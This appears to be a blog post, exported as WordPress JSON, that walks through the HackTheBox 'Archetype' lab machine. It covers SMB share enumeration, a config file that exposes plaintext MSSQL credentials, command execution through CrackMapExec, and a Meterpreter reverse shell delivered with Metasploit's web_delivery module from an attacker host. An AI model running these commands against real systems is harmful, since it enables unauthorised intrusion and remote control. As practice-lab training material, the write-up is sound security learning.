{"id":112,"date":"2023-06-22T19:14:43","date_gmt":"2023-06-22T19:14:43","guid":{"rendered":"https:\/\/synackrollbytes.com\/?p=112"},"modified":"2023-06-26T20:08:19","modified_gmt":"2023-06-26T20:08:19","slug":"metasploit-shell-through-crackmapexecs-web-deilvery-module-archetype-revisited-part-i","status":"publish","type":"post","link":"https:\/\/synackrollbytes.com\/?p=112","title":{"rendered":"Metasploit Shell Through CrackMapExec’s Web Deilvery Module – Archetype Revisited Part I"},"content":{"rendered":"\n

Archetype<\/a> on HackTheBox<\/h2>\n\n\n\n
\"\"<\/figure>\n\n\n\n

Archetype is a box on HacktheBox<\/a> that is classified as “very easy.” It’s in the starting point so it’s meant to give introductory lessons in using SMB, MSSQL, and discovering plain text passwords. After completing the CPTS path, I decided to go back and revisit the starting point machines and see where I could try different techniques and tools to expand my knowledge of them and practice.<\/p>\n\n\n\n

We start with an Nmap Scan:<\/p>\n\n\n\n

$ nmap -sC -sV 10.129.53.34\nStarting Nmap 7.93 ( https:\/\/nmap.org ) at 2023-06-21 13:21 BST\nNmap scan report for 10.129.53.34\nHost is up (0.070s latency).\nNot shown: 996 closed tcp ports (conn-refused)\nPORT     STATE SERVICE      VERSION\n135\/tcp  open  msrpc        Microsoft Windows RPC\n139\/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn\n445\/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds\n1433\/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2023-06-21T11:30:35\n|_Not valid after:  2053-06-21T11:30:35\n|_ssl-date: 2023-06-21T12:22:00+00:00; 0s from scanner time.\n|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)\n|_ms-sql-info: ERROR: Script execution failed (use -d to debug)\nService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 1h45m01s, deviation: 3h30m02s, median: 0s\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-time: \n|   date: 2023-06-21T12:21:55\n|_  start_date: N\/A\n| smb-os-discovery: \n|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)\n|   Computer name: Archetype\n|   NetBIOS computer name: ARCHETYPE\\x00\n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2023-06-21T05:21:56-07:00\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 16.64 seconds<\/code><\/pre>\n\n\n\n
There’s lots of places to start here, but if there’s an SMB port open and no web port, as here, I’ll usually start by looking at what’s in the share.  There’s a number of ways to do that.<\/p>\n\n\n\n
SMB Enumeration and File Download<\/h2>\n\n\n\n
We can start with SMBclient:<\/p>\n\n\n\n
$ smbclient -L \/\/10.129.53.34\nPassword for [WORKGROUP\\htb-user]:\n\n\tSharename       Type      Comment\n\t---------       ----      -------\n\tADMIN$          Disk      Remote Admin\n\tbackups         Disk      \n\tC$              Disk      Default share\n\tIPC$            IPC       Remote IPC\nSMB1 disabled -- no workgroup available\n<\/code><\/pre>\n\n\n\n
We see there is a share called “backups” that we might be ineterested in. We can login with SMBclient and get see what’s in there.<\/p>\n\n\n\n
$ smbclient '\\\\10.129.53.34\\backups'\nPassword for [WORKGROUP\\htb-user]:\nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Mon Jan 20 12:20:57 2020\n  ..                                  D        0  Mon Jan 20 12:20:57 2020\n  prod.dtsConfig                     AR      609  Mon Jan 20 12:23:02 2020\n\n\t\t5056511 blocks of size 4096. 2615956 blocks available\nsmb: \\> \n\n<\/code><\/pre>\n\n\n\n
We can then download this using the command download prod.dtsConfig<\/code>.<\/p>\n\n\n\n
We can do the same thing with SMBMap.<\/p>\n\n\n\n
$ smbmap -H 10.129.53.34 -u guest\n[+] IP: 10.129.53.34:445\tName: 10.129.53.34                                      \n    Disk                                                  \tPermissions\tComment\n\t----                                                  \t-----------\t-------\n\tADMIN$                                            \tNO ACCESS\tRemote Admin\n\tbackups                                           \tREAD ONLY\t\n\tC$                                                \tNO ACCESS\tDefault share\n\tIPC$                                              \tREAD ONLY\tRemote IPC\n$ smbmap -H 10.129.53.34 -u guest -r backups\n[+] IP: 10.129.53.34:445\tName: 10.129.53.34                                      \n    Disk                                                  \tPermissions\tComment\n\t----                                                  \t-----------\t-------\n\tbackups                                           \tREAD ONLY\t\n\t.\\backups\\*\n\tdr--r--r--                0 Mon Jan 20 12:20:57 2020\t.\n\tdr--r--r--                0 Mon Jan 20 12:20:57 2020\t..\n\tfw--w--w--              609 Mon Jan 20 12:23:18 2020\tprod.dtsConfig\n\n<\/code><\/pre>\n\n\n\n
Mount the \\backups<\/code> share<\/h2>\n\n\n\n
If we install cifs-utils with sudo apt install cifs-utils<\/code> we can mount the share and use it.<\/p>\n\n\n\n
$ sudo mount -t cifs '\\\\10.129.53.34\\backups' \/mnt\/remote\nPassword for root@\\\\10.129.53.34\\backups: \n$ cd \/mnt\/remote\n$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root    0 Jan 20  2020 .\ndrwxr-xr-x 3 root root 4096 Jun 21 10:58 ..\n-r-xr-xr-x 1 root root  609 Jan 20  2020 prod.dtsConfig\n\n<\/code><\/pre>\n\n\n\n
Exposed Credentials<\/h2>\n\n\n\n
However we choose to get the file, we find a set of creds in it when we examine it. Incidentally, this is one of the big lessons of the starting point track. Credentials are everyhwhere. They’re in user’s notes, they’re in config files, they’re hardcoded into binaries.<\/p>\n\n\n\n
$ cat prod.dtsConfig\n<DTSConfiguration>\n    <DTSConfigurationHeading>\n        <DTSConfigurationFileInfo GeneratedBy=\"...\" GeneratedFromPackageName=\"...\" GeneratedFromPackageID=\"...\" GeneratedDate=\"20.1.2019 10:01:34\"\/>\n    <\/DTSConfigurationHeading>\n    <Configuration ConfiguredType=\"Property\" Path=\"\\Package.Connections[Destination].Properties[ConnectionString]\" ValueType=\"String\">\n        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;<\/ConfiguredValue>\n    <\/Configuration>\n<\/DTSConfiguration><\/code><\/pre>\n\n\n\n
Check Logins with CrackmapExec (CME)<\/h2>\n\n\n\n
The walkthrough for the box now expects you to login and fiddle with the MSSQL service to create a reverse shell. That’s great info and useful, but I wanted to see what I could do with crackmapexec and metasploit. We can do the same with much less fiddling using crackmapexec (CME). First we check services that we’d previously identified with our nmap scan: SMB, winrm, and MSSQL.<\/p>\n\n\n\n
$ cme smb 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'\nSMB         10.129.53.34    445    ARCHETYPE        [*] Windows Server 2019 Standard 17763 x64 (name:ARCHETYPE) (domain:Archetype) (signing:False) (SMBv1:True)\nSMB         10.129.53.34    445    ARCHETYPE        [+] Archetype\\sql_svc:M3g4c0rp123 \n\n$ cme winrm 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'\nSMB         10.129.53.34    5985   ARCHETYPE        [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)\nHTTP        10.129.53.34    5985   ARCHETYPE        [*] http:\/\/10.129.53.34:5985\/wsman\nWINRM       10.129.53.34    5985   ARCHETYPE        [-] Archetype\\sql_svc:M3g4c0rp123\n\n$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'\nMSSQL       10.129.53.34    1433   ARCHETYPE        [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)\nMSSQL       10.129.53.34    1433   ARCHETYPE        [+] Archetype\\sql_svc:M3g4c0rp123 (Pwn3d!)\n\n<\/code><\/pre>\n\n\n\n
So we can see from this that we can login with smb, we can’t login with winrm and that the account has admin privileges over the MSSQL service. (Indicated by the flag Pwn3d!)<\/p>\n\n\n\n
This means that we can execute commands and very easily get a meterpreter shell going.<\/p>\n\n\n\n
Meterpreter Shell Using CME and the Sql_Svc Account.<\/h2>\n\n\n\n
Since we’ve got admin rights over the MSSQL service, it’s very easy to execute commands and even get a reverse shell. We can get a meterpreter shell without even uploading anything onto the target system.<\/p>\n\n\n\n
We can execute commands using the -X switch for example, we can get information about the target system using cme and the X switch:<\/p>\n\n\n\n
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123' -X systeminfo                                                                                   \nMSSQL       10.129.53.34    1433   ARCHETYPE        [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)\nMSSQL       10.129.53.34    1433   ARCHETYPE        [+] Archetype\\sql_svc:M3g4c0rp123 (Pwn3d!)    \nMSSQL       10.129.53.34    1433   ARCHETYPE        [+] Executed command via mssqlexec                \nMSSQL       10.129.53.34    1433   ARCHETYPE        --------------------------------------------------------------------------------\nMSSQL       10.129.53.34    1433   ARCHETYPE        Host Name:                 ARCHETYPE                    \nMSSQL       10.129.53.34    1433   ARCHETYPE        OS Name:                   Microsoft Windows Server 2019 Standard\nMSSQL       10.129.53.34    1433   ARCHETYPE        OS Version:                10.0.17763 N\/A Build 17763\n--- <SNIP> ---\nMSSQL       10.129.53.34    1433   ARCHETYPE        System Type:               x64-based PC\n\n<\/code><\/pre>\n\n\n\n
We setup to metasploit and then select the exploit\/multi\/script\/web_delivery<\/code> module and select the following commands:<\/p>\n\n\n\n
set lhost <Attack IP>\nset lport 4444\nset payload windows\/x64\/meterpreter\/reverse_tcp\nset target 2<\/code><\/pre>\n\n\n\n
[msf](Jobs:0 Agents:0) exploit(multi\/script\/web_delivery) >> optionsModule options (exploit\/multi\/script\/web_delivery):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen                                       on all addresses.   SRVPORT  8080             yes       The local port to listen on.   SSL      false            no        Negotiate SSL for incoming connections   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                   no        The URI to use for this exploit (default is random)Payload options (windows\/x64\/meterpreter\/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     <ATTACK IP>      yes       The listen address (an interface may be specified)   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   2   PSH\n\n<\/code><\/pre>\n\n\n\n
And run the job.<\/p>\n\n\n\n
[msf](Jobs:0 Agents:0) exploit(multi\/script\/web_delivery) >> run -j                                                                                         \n[*] Exploit running as background job 0.\n[*] Exploit completed, but no session was created.\n\n[*] Started reverse TCP handler on 10.10.14.15:4444 \n[msf](Jobs:1 Agents:0) exploit(multi\/script\/web_delivery) >> [*] Using URL: http:\/\/10.10.14.15:8080\/F7tGbZa9SUqbMJ\n[*] Server started.\n[*] Run the following command on the target machine:\n<SNIP>\n<\/code><\/pre>\n\n\n\n
The job starts and goes to background immediately. Basically, it’s waiting for a connection to serve up the payload. Now we run the web_delivery module on crackmapexec and use the url we were given by metasploit.<\/p>\n\n\n\n
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123' -M web_delivery -o URL=http:\/\/10.10.14.15:8080\/F7tGbZa9SUqbMJ\nMSSQL       10.129.53.34    1433   ARCHETYPE        [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)\nMSSQL       10.129.53.34    1433   ARCHETYPE        [+] Archetype\\sql_svc:M3g4c0rp123 (Pwn3d!)\n\n<\/code><\/pre>\n\n\n\n
And we get a meterpreter shell!<\/p>\n\n\n\n
[msf](Jobs:1 Agents:0) exploit(multi\/script\/web_delivery) >> [*] 10.129.53.34     web_delivery - Delivering Payload (3738 bytes)\n[*] Sending stage (200774 bytes) to 10.129.53.34\n[*] Meterpreter session 1 opened (10.10.14.15:4444 -> 10.129.53.34:49677) at 2023-06-21 15:04:35 +0100\n[msf](Jobs:1 Agents:0) exploit(multi\/script\/web_delivery) >> sessions -i 1\n[*] Starting interaction with 1...\n\n(Meterpreter 1)(C:\\Windows\\system32) >\n\n<\/code><\/pre>\n\n\n\n
I’ll cover escalating using Rogue Potato in Part II.<\/p>\n","protected":false},"excerpt":{"rendered":"
Archetype on HackTheBox Archetype is a box on HacktheBox that is classified as “very easy.” It’s in the starting point so it’s meant to give introductory lessons in using SMB, MSSQL, and discovering plain text passwords. After completing the CPTS … Continue reading →<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,7,6],"tags":[],"class_list":["post-112","post","type-post","status-publish","format-standard","hentry","category-crackmapexec","category-metasploit","category-penetration-testing"],"_links":{"self":[{"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=\/wp\/v2\/posts\/112","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=112"}],"version-history":[{"count":18,"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=\/wp\/v2\/posts\/112\/revisions"}],"predecessor-version":[{"id":158,"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=\/wp\/v2\/posts\/112\/revisions\/158"}],"wp:attachment":[{"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=112"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=112"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/synackrollbytes.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=112"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}